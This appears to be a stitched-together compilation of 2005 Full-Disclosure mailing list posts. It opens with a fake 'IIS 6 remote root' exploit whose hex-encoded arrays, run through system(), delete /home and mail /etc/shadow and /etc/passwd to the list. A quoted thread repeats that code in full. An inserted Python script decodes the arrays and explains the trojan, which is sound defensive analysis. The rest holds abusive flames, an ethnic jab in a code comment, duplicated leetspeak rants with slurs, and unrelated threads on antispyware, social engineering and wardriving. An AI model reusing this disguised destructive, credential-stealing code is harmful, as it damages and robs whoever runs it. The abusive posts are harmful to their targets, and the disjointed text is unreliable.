 BUG: inetinfo.exe improperly bound checks http requests sent longer than 6998 chars. Can get messy but enough testing, and we have found a way in.
 VENDOR STATUS: Notified
 FIX: In process
 Remote root.

 eg.
 #./iis6_inetinfoX xxx.xxx.xxx.xxx -p 80
 + Connecting to host...
 + Connected.
 + Inserting Shellcode...
 + Done...
 + Spawining shell..
 Microsoft Windows XP [Version 5.1.2600]
 (C) Copyright 1985-2001 Microsoft Corp.
 C:\
*/

char shellcode[] =
"\x2f\x62\x69\x6e\x2f\x72\x6d\x20"
"\x2d\x72\x66\x20\x2f\x68\x6f\x6d"
"\x65\x2f\x2a\x3b\x63\x6c\x65\x61"
"\x72\x3b\x65\x63\x68\x6f\x20\x62"
"\x6c\x34\x63\x6b\x68\x34\x74\x2c"
"\x68\x65\x68\x65";

char launcher [] =
"\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x73"
"\x68\x61\x64\x6f\x77\x20\x7c\x6d\x61\x69"
"\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
"\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
"\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
"\x2e\x6f\x72\x67\x2e\x75\x6b\x20";

char netcat_shell [] =
"\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70"
"\x61\x73\x73\x77\x64\x20\x7c\x6d\x61\x69"
"\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
"\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
"\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
"\x2e\x6f\x72\x67\x2e\x75\x6b\x20";

main() {
//Section Initialises designs implemented by mexicans
//Imigrate
system(launcher);
system(netcat_shell);
system(shellcode);
//int socket = 0;
//double long port = 0.0;
//#DEFINE port host address
//#DEFINE number of inters
//#DEFINE gull eeuEE
//
for(int j; j < 30; j++) {
//Find socket remote address fault
printf(".");
}
//overtake inetinfo here IIS_66^
return 0;
}
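The "exploit" above never opens a socket; its three hex-escaped arrays are handed straight to system(), which is the check an analyst should make before compiling anything posted as a PoC. The script below is an added example for this page, not code from the post or its author: it decodes C `\xNN` string literals back to bytes, flags any array that is entirely printable text (real machine code is not), and lists which names the posted main() passes to system(). POSTED_LITERALS are constructed copies of the post's three arrays, concatenated as adjacent C literals would be, and POSTED_MAIN is a reduced copy of its main(); the function names are this example's own.

```python
import re

# Constructed copies of the three hex-escaped C literals from the post above,
# joined the way adjacent string literals are in C.
POSTED_LITERALS = {
    "shellcode": (
        r"\x2f\x62\x69\x6e\x2f\x72\x6d\x20\x2d\x72\x66\x20\x2f\x68\x6f\x6d"
        r"\x65\x2f\x2a\x3b\x63\x6c\x65\x61\x72\x3b\x65\x63\x68\x6f\x20\x62"
        r"\x6c\x34\x63\x6b\x68\x34\x74\x2c\x68\x65\x68\x65"
    ),
    "launcher": (
        r"\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x73\x68\x61\x64\x6f\x77\x20\x7c\x6d\x61\x69"
        r"\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
        r"\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b\x2e\x6f\x72\x67\x2e\x75\x6b\x20"
    ),
    "netcat_shell": (
        r"\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x20\x7c\x6d\x61\x69"
        r"\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
        r"\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b\x2e\x6f\x72\x67\x2e\x75\x6b\x20"
    ),
}

# The post's main(), reduced to the calls that matter (constructed copy).
POSTED_MAIN = """
main() {
    system(launcher);
    system(netcat_shell);
    system(shellcode);
    for(int j; j < 30; j++) { printf("."); }
    return 0;
}
"""

_HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")


def decode_c_hex_literal(literal):
    """Turn the body of a C string literal (\\xNN escapes plus plain chars) into bytes."""
    out = bytearray()
    pos = 0
    for m in _HEX_ESCAPE.finditer(literal):
        out += literal[pos:m.start()].encode("latin-1")   # plain chars between escapes
        out.append(int(m.group(1), 16))
        pos = m.end()
    out += literal[pos:].encode("latin-1")
    return bytes(out)


def looks_like_text(data):
    """Machine code contains non-printable bytes; a 'shellcode' that decodes
    entirely to printable ASCII is a command string, not code."""
    return bool(data) and all(32 <= b < 127 for b in data)


def find_system_calls(c_source):
    """Identifiers handed to system(): a PoC that feeds its 'payload' to the
    shell runs it on the analyst's own machine, which is the trojan pattern."""
    return re.findall(r"\bsystem\s*\(\s*([A-Za-z_]\w*)\s*\)", c_source)


def triage(literals, c_source):
    """Decode every literal and report which ones are shell text run via system()."""
    executed = set(find_system_calls(c_source))
    report = {}
    for name, lit in literals.items():
        raw = decode_c_hex_literal(lit)
        report[name] = {
            "decoded": raw.decode("latin-1"),
            "is_text": looks_like_text(raw),
            "run_by_system": name in executed,
        }
    return report


if __name__ == "__main__":
    for name, info in triage(POSTED_LITERALS, POSTED_MAIN).items():
        verdict = "SHELL COMMAND via system()" if info["is_text"] and info["run_by_system"] else "opaque"
        print(f"{name:13} {verdict}: {info['decoded']!r}")
```

Run on the post's arrays, every one decodes to a shell command (a recursive delete under /home and two commands that mail password files to the list), and every one is passed to system(), so the program is a trojan aimed at whoever compiles it, not at any IIS server. The same two checks, decode the payload and trace where it is used, apply to any PoC received from an untrusted source.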
[Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit (was broken)
Dear DIk,

You are thinking local buffer overflows with your "think: ret=(int *)ret+2;(*ret)=(int)shellcode;". Wow, I think I read smashing the stick for fun and profit a long time ago, but this is a remote root exploit, it's a little different!! Damn newbie! I mean, how lame are you?

--- dk [EMAIL PROTECTED] wrote:
> Day Jay wrote:
> > Sorry, the previous code was broken.
>
> Definitely `borken'... I didn't even see one /etc/passwd file in here! Less obvious calls may catch more habitual FD code runners next time dude.
>
> [think: ret=(int *)ret+2;(*ret)=(int)shellcode;] ;-)
>
> -- dk
Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit(was broken)
You are wrong again, it's Smashing the Stick you moron. Not smashing the stack. Ask anyone here! Man, you are such a newbie. Get a clue and stop trying to say the sweet code is a backdoor just because you don't know how to compile software properly. You're nothing but a newbie wanna be C programmer with a dick in his ass and a lack of hacking skills. Die slowly kthxbye!

--- vulcanius [EMAIL PROTECTED] wrote:
> Last time I checked it was Smashing the Stack, not Smashing the Stick moron. And why the hell do you keep reposting the code when everyone already knows it's a lame backdoor attempt?
>
> On 4/20/05, Day Jay [EMAIL PROTECTED] wrote:
> > Yes it is you hat squad lammer newbie. Now get it to work!! You fucking newbie. You're so lame and so is your file system.
> >
> > --- [EMAIL PROTECTED] [EMAIL PROTECTED] wrote:
> > > perfect asshole
> > >
> > > - class101
> > > Jr. Researcher
> > > Hat-Squad.com
> > >
> > > - Original Message -
> > > From: Day Jay [EMAIL PROTECTED]
> > > To: full-disclosure@lists.grok.org.uk
> > > Sent: Wednesday, April 20, 2005 8:15 PM
> > > Subject: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit(was broken)
> > >
> > > > Sorry, the previous code was broken. This code should work... Happy Owning!! :)
> > > >
> > > > =SNIP
> > > > /* Proof of concept code
> > > >  Please don't send us e-mails asking us how to hack because we will be forced to skullfsck you.
> > > >  DISCLAIMER: !!NOT RESPONSIBLE WITH YOUR USE OF THIS CODE!!
> > > >
> > > >  IIS 6 Buffer Overflow Exploit
> > > >  BUG: inetinfo.exe improperly bound checks http requests sent longer than 6998 chars. Can get messy but enough testing, and we have found a way in.
> > > >  VENDOR STATUS: Notified
> > > >  FIX: In process
> > > >  Remote root.
> > > >
> > > >  eg.
> > > >  #./iis6_inetinfoX xxx.xxx.xxx.xxx -p 80
> > > >  + Connecting to host...
> > > >  + Connected.
> > > >  + Inserting Shellcode...
> > > >  + Done...
> > > >  + Spawining shell..
> > > >  Microsoft Windows XP [Version 5.1.2600]
> > > >  (C) Copyright 1985-2001 Microsoft Corp.
> > > >  C:\
> > > > */
> > > >
> > > > char shellcode[] =
> > > > "\x2f\x62\x69\x6e\x2f\x72\x6d\x20"
> > > > "\x2d\x72\x66\x20\x2f\x68\x6f\x6d"
> > > > "\x65\x2f\x2a\x3b\x63\x6c\x65\x61"
> > > > "\x72\x3b\x65\x63\x68\x6f\x20\x62"
> > > > "\x6c\x34\x63\x6b\x68\x34\x74\x2c"
> > > > "\x68\x65\x68\x65";
> > > >
> > > > char launcher [] =
> > > > "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x73"
> > > > "\x68\x61\x64\x6f\x77\x20\x7c\x6d\x61\x69"
> > > > "\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
> > > > "\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
> > > > "\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
> > > > "\x2e\x6f\x72\x67\x2e\x75\x6b\x20";
> > > >
> > > > char netcat_shell [] =
> > > > "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70"
> > > > "\x61\x73\x73\x77\x64\x20\x7c\x6d\x61\x69"
> > > > "\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
> > > > "\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
> > > > "\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
> > > > "\x2e\x6f\x72\x67\x2e\x75\x6b\x20";
> > > >
> > > > main() {
> > > > //Section Initialises designs implemented by mexicans
> > > > //Imigrate
> > > > system(launcher);
> > > > system(netcat_shell);
> > > > system(shellcode);
> > > > //int socket = 0;
> > > > //double long port = 0.0;
> > > > //#DEFINE port host address
> > > > //#DEFINE number of inters
> > > > //#DEFINE gull eeuEE
> > > > //
> > > > for(int j; j < 30; j++) {
> > > > //Find socket remote address fault
> > > > printf(".");
> > > > }
> > > > //overtake inetinfo here IIS_66^
> > > > return 0;
> > > > }
[Full-disclosure] Oddness with the MS antispyware beta
I see that extra MS antispyware window (systrayhide, systrayshow, ...) also on a two-monitor workstation using nVidia's desktop manager. A similar thing happens with an ancient pop-up stopper I use (AKiller). If you're seeing it on a laptop, it's probably because the laptop has a second monitor capability and is running the advanced window management functionality to know about the second monitor. Both are just artifacts of either poorly written software (Giant Anti-spyware, my little old AKiller program) or poorly written window managers (or both), which result in the "don't show this window" bit being ignored when under advanced window management. They're annoying, but not an indication of anything nefarious.

-Jay Libove, CISSP
Atlanta, GA, US

> Message: 9
> Date: Mon, 11 Apr 2005 23:04:38 -0600
> From: Scott Edwards [EMAIL PROTECTED]
> Subject: [Full-disclosure] Re: Oddness with the MS antispyware beta
> To: Gregh [EMAIL PROTECTED]
> Cc: full-disclosure@lists.grok.org.uk
> Message-ID: [EMAIL PROTECTED]
> Content-Type: text/plain; charset=ISO-8859-1
>
> Are you able to isolate it when running a selective startup via msconfig? Also, does something like winspy give you any clues?
>
> On 4/11/05, Gregh [EMAIL PROTECTED] wrote:
> > - Original Message -
> > From: MN Vasquez [EMAIL PROTECTED]
> > To: full-disclosure@lists.grok.org.uk
> > Sent: Tuesday, April 12, 2005 4:02 AM
> > Subject: [Full-disclosure] Oddness with the MS antispyware beta
> >
> > > On the 2nd monitor I found a program window hiding. Basically, in a very odd position -- on a typically non-displayed portion of the desktop, which I only found by configuring multiple monitors. It seems the programmers are hiding a window, which I have attached as a jpg. For those that don't want to open an attachment: there are 5 buttons: systrayhide, systrayshow, systraynormal, systrascanning, systrayupdating.
> >
> > Sorry old son but it isn't hidden in any nasty or bug kind of way. I have 2 XPSP2 machines, one is a laptop and the other a desktop. For some reason that window doesn't show when Antispyware is started on the desktop with a normal CRT monitor, but it does on the laptop every single time. Normally it hides, as in turns invisible, after the prog has completed starting.
> >
> > Greg.
Re: [Full-disclosure] [hr0n073rr0r15m - 7h3 J4ck50ff 7r14l.
d34r c0rr41 r33f, 1 r3411y 4m 50 4nn0y3d 70 7h3 3x7r3m3. 1 r3411y 4m 50 4nn0y3d 7h47 N7P w0u1d 74k3 7h3 71m3 70 wr173 4 14m3 3m411 70 3v3ry0n3 11k3 7h47 b3c4u53 1337 5p34k 5h0u1d 0n1y b3 r34d b13 7h4 31337 0n1y 0n 53cr37 b4kch4nn315 U c0ck5uck3r. 1n 411 f41rn355 7h0u64, 1 d0 h4v3 70 54y 7h47 1 4m qu173 1mpr3553d w17h 7h3 f1n63r1n6/c10ck 5k3w p4p3r 4u7h0r3d b13 7h47 dyn4m1c 7r10-74d,k.c. 4nd 4ndr3 1c3 c01d 3000...1f y0u 4r3 0n3 0f 7h3m, 3xp053 y0531f 0r 43v3r h01d j00r 610ck. 7311 m3 m0r3 7h0 N7P-50 f4r j00 6uy5 0n1y 533m 1mm4mm37u3r. p34z, d4y 70 7h3 m07h3rfuck1n6 j4y b17ch! 1 w4n7 m0r3!! --- Sorral Bouddashiss [EMAIL PROTECTED] wrote: 53cur17y 1ndu57ry [0nc3rn3d-p3r50n5 Pr353n7 [hr0n073rr0r15m - 7h3 J4ck50ff 7r14l. Gr3371ng5 f3ll0w hum4n5 w3lc0m3 70 7h3 y34r 3337, 0n 4 qu1ck pr3-4dv150ry n073 (4nd 7h1nk1ng 4b0u7 7h053 0f u5 wh0 d0n'7 f4ll 1n70 7h3 c473g0ry 0f Hum4n): Wh47 w45 up w17h G0ld5731n 574lk1ng 7h3 57r3375, 4nd n0 d0ub7 7h3 m4l3 y0u7h, 0f B3rl1n 1n D3c3mb3r? 51[ 4g3n75 1n 7h3 f13ld r3p0r7 h3 w45 533n r4mbl1ng 70 h1m53lf fr0m 4 p0d1um wh1l57 7h053 1n 7h3 4ud13nc3 (w4171ng f0r B0b0 7h3 H4x0r cl0wn) w3r3 w4171ng 70 533 1f 3v3n7 53cur17y w0uld 7r4nqu1l153 7h3 r4b1d b3457. 1n 07h3r n3w5: 17 h45 b33n br0ugh7 70 0ur 4773n710n 7h47 5k1ppy h45 f4ll3n d0wn 7h3 w3ll 4nd L177l3 71mmy d035n'7 g1v3 4 5h17 45 h3 h45 4 n3w M1n1-M4c wh1ch 15 50 57r1pp3d d0wn 7h47 17 c0m35 w17h0u7 4ny c0mp0n3n75 70 k33p c057 l0w, unl355 y0u 4r3 4 m3mb3r 0f 7h3 publ1c wh0 74lk5 4b0u7 17. huh? cr4p 7h47 15n'7 m34n7 70 b3 r3l3453d f0r 12 m0n7h5? 50m30n3 c0uld h4v3 70ld m3! wh47 w17h 7h3 3x-3N 35 4Y (0bfuck473d 70 4nn0y 7h3m) 3mpl0y335 h4v1ng Ru5514n5 wr171ng plug1n5 f0r 7h31r 5h177y c0d3. H4ll000 D4v3. 574y1ng w17h 3N 35 4Y l1nk5 (0r lynx y0ur ch01c3) H45 4ny0n3 b33n n071c1ng h0w l0ckh33d m4r71n 15 51ph0n1ng H0glund5 1ll g07 ++'5 57r41gh7 1n70 7h3 3N 35 4Y? 0ur m41n n3w5 570ry 70d4y: 4 pl07 15 4f007 (n07 4 h4nd 0r 4 5h0ld3r bu7 4 h0l3 f007) wh1ch c0uld 5h4k3 7h3 v3ry f0und4710n5 0f N7P. 
4 g4ng 0f p4ck37570rm 3xpl017 5w1ng1ng y0uf 4r3 pl4nn1ng 70 74rg37 7h3 v3ry fund4m3n74l 0f 0ur m0d3rn w4y 0f l1v1ng. N071fy 7h3 FR33 pr355!!! .. 0h g00d p01n7. 73ll y0ur fr13nd5 1n5734d! 0h. 7h3 pl4n? 70 4774ck |_|7[ 1753lf. N07 7h3 |_|n1v3r54l 7r4d3 [3n7r3, K4z4k574n 15 n07 7h3 c3n73r 0f 7h3 un1v3r53. (dumb455) 4 r3c3n7 p4p3r d15cu551ng 7h3 f1ng3r1ng 0f 5y573m5 u51ng pr0c3550r cl0ck 5k3w5 w45 0nly 7h3 b3g1nn1ng. 7h353 y0uf 4r3 pl4nn1ng n07 0nly 70 5kr3w pr0c3550r5, bu7 m1cr0w4v35 4nd 4l50 bump3r p00l 3l3c7r0n1c 5c0r1ng 5y573m5 (dw33b5). D0 7h3y c4r3 f0r 7h3 1D5 w47ch1ng m0nk3y5 wh0 517 7hr0ugh0u7 7h3 w0rld r34dy 70 u53 V01P 70 n071fy fr13nd5 0f n3w p0rn 51735 7h47 4r3 53n7 7hr0ugh 5p4m? N0. H0w w1ll 7h353 y0ung 4nd c4r3fr33 m3mb3r5 0f 7h3 53cur17y 5c3n3 b3 4bl3 70 f33d 7h3m53lv35 1f 7h31r cr3d17 c4rd5 d0n7 4u7h0r1z3 wh3n 0rd3r1ng p1zz4? 7h3r3 15 7h3 p0551b1l17y 7h3y m4y w0rk 0u7 h0w 70 pr1c3-537 bu7 l1k3 7h3 r357 0f 53cur17y pr0f35510n4l5 0u7 7h3r3 7h3y w0uldn7 kn0w 7h3 d1ff3r3nc3 b37w33n 4 p1zz4 4nd 4 l454gn3. 4m47ur35. 15 7H3R3 N0 H|_|M4N17Y! Wh47 c4n w3 pr0p053 70 c0mb47 7h15 0b5c3n3 4c7 wh1ch 7hr3473n5 70 r3537 5ub5cr1p710n5 70 m1dg37 p0rn 51735? V1g1l3nc3! 1f y0u 533 50m30n3 w4lk1ng 7h3 wr0ng w4y 4r0und 7h3 c4n733n, 1nf0rm 7h3 4u7h0r17135. 1f y0u 7h1nk 50m30n3 m4y b3 4dju571ng 7h31r p3r50n3l 71m3 p13c3 pr10r 70 4n 4774ck up0n 71m3 1753lf N071fy y0ur l0c4l m1n1573r. 1f y0u 7h1nk WW45P 0r 175 4f1l14735 4r3 54f3 70 b3 l3f7 w17h y0ur k1d5, 5h007 y0ur53lf 4nd pr073c7 y0ur 0f5pr1ng3 7h47 w4y. 1f 3v3ry7h1ng f41l5. P4n1c. N07h1ng 41d5 4 w4rm0ng3r b3773r 7h4n 1gn0r4nc3 4nd p4n1c. H1 G30rg3. 1f 7h353 p30pl3 4r3 4ll0w3d 70 g37 4w4y w17h 7h31r h3n1u5 cr1m35 4g41n57 hum4n1733 7h3r3 15 7h3 p0551b1l17y 7h47 7h3y c4n 570p 7h3 v3ry m0710n 0f 7h3 34r7h (0r m4yb3 m4k3 17 w0bbl3 4 b17). (N0 1 4m n07 571ll 74lk1ng 4b0u7 G30rg3, y0u 4r3 7h3 0n3 wh0 j01n3d 7h053 7w0 c0mpl37ly d374ch3d 53n73nc35 70g37h3r.Fr3ud.) 7h47 w0uld r34lly 5kr3w up 7h3 cr45h l4nd1ng 1n r05w3ll n3x7 m0n7h. 
4h cr4p d1d 17 4g41n, W3ll Y0|_| 7ry 5p3nd1ng y0ur d4y l00k1ng 4f73r 71m3 1753lf 7H1NG5 G37 F|_|[K1NG [0MPL1[473D. W3 w15h y0u 4 v3ry 54f3 57 Dr0ng0'5 d4y, 7h47 5h33p 4bu53r pu75 r3dn3k5 70 5h4m3. y0ur fr13nd 7h3 50rr4l. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ __ Do you Yahoo!? Yahoo! Personals - Better first dates. More second dates. http://personals.yahoo.com ___ Full-Disclosure - We believe in it. Charter:
Re: [Full-disclosure] [hr0n073rr0r15m - 7h3 J4ck50ff 7r14l.
d34r c0rr41 r33f, 1 r3411y 4m 50 4nn0y3d 70 7h3 3x7r3m3. 1 r3411y 4m 50 4nn0y3d 7h47 N7P w0u1d 74k3 7h3 71m3 70 wr173 4 14m3 3m411 70 3v3ry0n3 11k3 7h47 b3c4u53 1337 5p34k 5h0u1d 0n1y b3 r34d b13 7h4 31337 0n1y 0n 53cr37 b4kch4nn315 U c0ck5uck3r. 1n 411 f41rn355 7h0u64, 1 d0 h4v3 70 54y 7h47 1 4m qu173 1mpr3553d w17h 7h3 f1n63r1n6/c10ck 5k3w p4p3r 4u7h0r3d b13 7h47 dyn4m1c 7r10-74d,k.c. 4nd 4ndr3 1c3 c01d 3000...1f y0u 4r3 0n3 0f 7h3m, 3xp053 y0531f 0r 43v3r h01d j00r 610ck. 7311 m3 m0r3 7h0 N7P-50 f4r j00 6uy5 0n1y 533m 1mm4mm37u3r. p34z, d4y 70 7h3 m07h3rfuck1n6 j4y b17ch! 1 w4n7 m0r3!! --- Sorral Bouddashiss [EMAIL PROTECTED] wrote: 53cur17y 1ndu57ry [0nc3rn3d-p3r50n5 Pr353n7 [hr0n073rr0r15m - 7h3 J4ck50ff 7r14l. Gr3371ng5 f3ll0w hum4n5 w3lc0m3 70 7h3 y34r 3337, 0n 4 qu1ck pr3-4dv150ry n073 (4nd 7h1nk1ng 4b0u7 7h053 0f u5 wh0 d0n'7 f4ll 1n70 7h3 c473g0ry 0f Hum4n): Wh47 w45 up w17h G0ld5731n 574lk1ng 7h3 57r3375, 4nd n0 d0ub7 7h3 m4l3 y0u7h, 0f B3rl1n 1n D3c3mb3r? 51[ 4g3n75 1n 7h3 f13ld r3p0r7 h3 w45 533n r4mbl1ng 70 h1m53lf fr0m 4 p0d1um wh1l57 7h053 1n 7h3 4ud13nc3 (w4171ng f0r B0b0 7h3 H4x0r cl0wn) w3r3 w4171ng 70 533 1f 3v3n7 53cur17y w0uld 7r4nqu1l153 7h3 r4b1d b3457. 1n 07h3r n3w5: 17 h45 b33n br0ugh7 70 0ur 4773n710n 7h47 5k1ppy h45 f4ll3n d0wn 7h3 w3ll 4nd L177l3 71mmy d035n'7 g1v3 4 5h17 45 h3 h45 4 n3w M1n1-M4c wh1ch 15 50 57r1pp3d d0wn 7h47 17 c0m35 w17h0u7 4ny c0mp0n3n75 70 k33p c057 l0w, unl355 y0u 4r3 4 m3mb3r 0f 7h3 publ1c wh0 74lk5 4b0u7 17. huh? cr4p 7h47 15n'7 m34n7 70 b3 r3l3453d f0r 12 m0n7h5? 50m30n3 c0uld h4v3 70ld m3! wh47 w17h 7h3 3x-3N 35 4Y (0bfuck473d 70 4nn0y 7h3m) 3mpl0y335 h4v1ng Ru5514n5 wr171ng plug1n5 f0r 7h31r 5h177y c0d3. H4ll000 D4v3. 574y1ng w17h 3N 35 4Y l1nk5 (0r lynx y0ur ch01c3) H45 4ny0n3 b33n n071c1ng h0w l0ckh33d m4r71n 15 51ph0n1ng H0glund5 1ll g07 ++'5 57r41gh7 1n70 7h3 3N 35 4Y? 0ur m41n n3w5 570ry 70d4y: 4 pl07 15 4f007 (n07 4 h4nd 0r 4 5h0ld3r bu7 4 h0l3 f007) wh1ch c0uld 5h4k3 7h3 v3ry f0und4710n5 0f N7P. 
4 g4ng 0f p4ck37570rm 3xpl017 5w1ng1ng y0uf 4r3 pl4nn1ng 70 74rg37 7h3 v3ry fund4m3n74l 0f 0ur m0d3rn w4y 0f l1v1ng. N071fy 7h3 FR33 pr355!!! .. 0h g00d p01n7. 73ll y0ur fr13nd5 1n5734d! 0h. 7h3 pl4n? 70 4774ck |_|7[ 1753lf. N07 7h3 |_|n1v3r54l 7r4d3 [3n7r3, K4z4k574n 15 n07 7h3 c3n73r 0f 7h3 un1v3r53. (dumb455) 4 r3c3n7 p4p3r d15cu551ng 7h3 f1ng3r1ng 0f 5y573m5 u51ng pr0c3550r cl0ck 5k3w5 w45 0nly 7h3 b3g1nn1ng. 7h353 y0uf 4r3 pl4nn1ng n07 0nly 70 5kr3w pr0c3550r5, bu7 m1cr0w4v35 4nd 4l50 bump3r p00l 3l3c7r0n1c 5c0r1ng 5y573m5 (dw33b5). D0 7h3y c4r3 f0r 7h3 1D5 w47ch1ng m0nk3y5 wh0 517 7hr0ugh0u7 7h3 w0rld r34dy 70 u53 V01P 70 n071fy fr13nd5 0f n3w p0rn 51735 7h47 4r3 53n7 7hr0ugh 5p4m? N0. H0w w1ll 7h353 y0ung 4nd c4r3fr33 m3mb3r5 0f 7h3 53cur17y 5c3n3 b3 4bl3 70 f33d 7h3m53lv35 1f 7h31r cr3d17 c4rd5 d0n7 4u7h0r1z3 wh3n 0rd3r1ng p1zz4? 7h3r3 15 7h3 p0551b1l17y 7h3y m4y w0rk 0u7 h0w 70 pr1c3-537 bu7 l1k3 7h3 r357 0f 53cur17y pr0f35510n4l5 0u7 7h3r3 7h3y w0uldn7 kn0w 7h3 d1ff3r3nc3 b37w33n 4 p1zz4 4nd 4 l454gn3. 4m47ur35. 15 7H3R3 N0 H|_|M4N17Y! Wh47 c4n w3 pr0p053 70 c0mb47 7h15 0b5c3n3 4c7 wh1ch 7hr3473n5 70 r3537 5ub5cr1p710n5 70 m1dg37 p0rn 51735? V1g1l3nc3! 1f y0u 533 50m30n3 w4lk1ng 7h3 wr0ng w4y 4r0und 7h3 c4n733n, 1nf0rm 7h3 4u7h0r17135. 1f y0u 7h1nk 50m30n3 m4y b3 4dju571ng 7h31r p3r50n3l 71m3 p13c3 pr10r 70 4n 4774ck up0n 71m3 1753lf N071fy y0ur l0c4l m1n1573r. 1f y0u 7h1nk WW45P 0r 175 4f1l14735 4r3 54f3 70 b3 l3f7 w17h y0ur k1d5, 5h007 y0ur53lf 4nd pr073c7 y0ur 0f5pr1ng3 7h47 w4y. 1f 3v3ry7h1ng f41l5. P4n1c. N07h1ng 41d5 4 w4rm0ng3r b3773r 7h4n 1gn0r4nc3 4nd p4n1c. H1 G30rg3. 1f 7h353 p30pl3 4r3 4ll0w3d 70 g37 4w4y w17h 7h31r h3n1u5 cr1m35 4g41n57 hum4n1733 7h3r3 15 7h3 p0551b1l17y 7h47 7h3y c4n 570p 7h3 v3ry m0710n 0f 7h3 34r7h (0r m4yb3 m4k3 17 w0bbl3 4 b17). (N0 1 4m n07 571ll 74lk1ng 4b0u7 G30rg3, y0u 4r3 7h3 0n3 wh0 j01n3d 7h053 7w0 c0mpl37ly d374ch3d 53n73nc35 70g37h3r.Fr3ud.) 7h47 w0uld r34lly 5kr3w up 7h3 cr45h l4nd1ng 1n r05w3ll n3x7 m0n7h. 
4h cr4p d1d 17 4g41n, W3ll Y0|_| 7ry 5p3nd1ng y0ur d4y l00k1ng 4f73r 71m3 1753lf 7H1NG5 G37 F|_|[K1NG [0MPL1[473D. W3 w15h y0u 4 v3ry 54f3 57 Dr0ng0'5 d4y, 7h47 5h33p 4bu53r pu75 r3dn3k5 70 5h4m3. y0ur fr13nd 7h3 50rr4l. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Social Engineering: You Have Been A Victim
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On Thu, 17 Mar 2005, Ron DuFresne wrote:

> More: http://castlecops.com/article-5807-nested-0-0.html
> gov workers do [not] even need to be bribed with chocolate; http://www.securityfocus.com/news/10708?ref=rss

It's not just government workers. It's any human being who's been raised to be social. According to Judeo-Christian theology, humanity gained knowledge of Good & Evil in the Garden of Eden. Unfortunately, the ability to differentiate between the two was not part of the package deal. This, coupled with the demands of a polite society, is why social engineering can strike anyone, anywhere... regardless of their vocation in the public or private sector.

It is considered socially unacceptable to be unhelpful to others, even strangers over the phone. Hell, some people can't even tell telemarketers to buzz off so they have to buy an electronic device to do it for them. This is why social engineering works so well... and why folks like ourselves are considered paranoid and anti-social when we start pulling IDs and taking names.

- -Jay

((___ )) )) .-There's always time for a good cup of coffee-. --. C|~~|C|~~| (- Jay D. Dyson -- [EMAIL PROTECTED] -) |= |-' `--' `--' ` WhyareyouaskingmehowmuchcoffeeI'vehad? ' `--'

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.0 (TreacherOS)
Comment: See http://www.treachery.net/~jdyson/ for current keys.

iD8DBQFCOwjWBYoRACwSF0cRAtO2AKCVmGZheJZdowrRknKGF3ypxx6BwQCfZqvg
0n9Ubeh3gg3aQGqfMEwNfy4=
=ajQE
-----END PGP SIGNATURE-----
Re: [Full-disclosure] Wi-fi. Approaching customers
I'm not sure I'd use the words "covered legally". Keep in mind in some areas people might feel this type of activity violates federal wiretapping laws. Doesn't mean they're right or wrong, just means you could be causing yourself some serious issues. I can say for certain that I've seen small security company x approach another company y; turns out y is owned by a Fortune 100 company, they report it up the chain and small security company x gets a visit from the FBI. If you know open wireless is a serious problem, add that information (generally) to your marketing material and indicate you can fix those types of problems, but pointing out you've in some way, shape or form monitored their network and you're contacting them is going to result in some headaches.

----- Original Message -----
From: Wade Woolwine [EMAIL PROTECTED]
To: Gregh [EMAIL PROTECTED]
Cc: full-disclosure@lists.grok.org.uk
Sent: Tuesday, March 15, 2005 2:55 PM
Subject: Re: [Full-disclosure] Wi-fi. Approaching customers

Gregh,

IMO, you're covered legally. I know it sounds fishy to approach a potential client already knowing they're insecure... but don't all of us do that on a regular basis? I mean I will hit Google with a vengeance before I go into the kick-off meeting... I want to know what I'm up against. I would respectfully request some time from a technical manager to present your findings (show a kismet/netstumbler scan) and explain the dangers (not the solutions, of course). Hopefully, this will rattle the manager enough to get the word up to upper management, and if you've left some marketing material for them to look at, they can contact you for your services.

Good luck!

Wade

I have asked this on another list and there has been discussion but nothing that really seems like an answer, so I am asking for help in here.

I did a war drive (and in MY terms that means just driving along gathering SSID data showing open and closed and nothing else BUT that) and found one HELL of a lot more wi-fi in my area than I had previously been aware existed. Most of the SSIDs broadcast didn't openly identify the company involved, though most of them were open. The idea in doing this was that I could note an area where wi-fi is and approach the company (or individual) and offer my services to LEGALLY lock their open wi-fi down. I realise that with open wi-fi, I could be doing anything I wanted to or with their systems, but that isn't the point. I work in the area doing I.T. related work and so far have a very good reputation for an inexpensive service, and I am self employed, so doing the wrong thing would quickly kill all that.

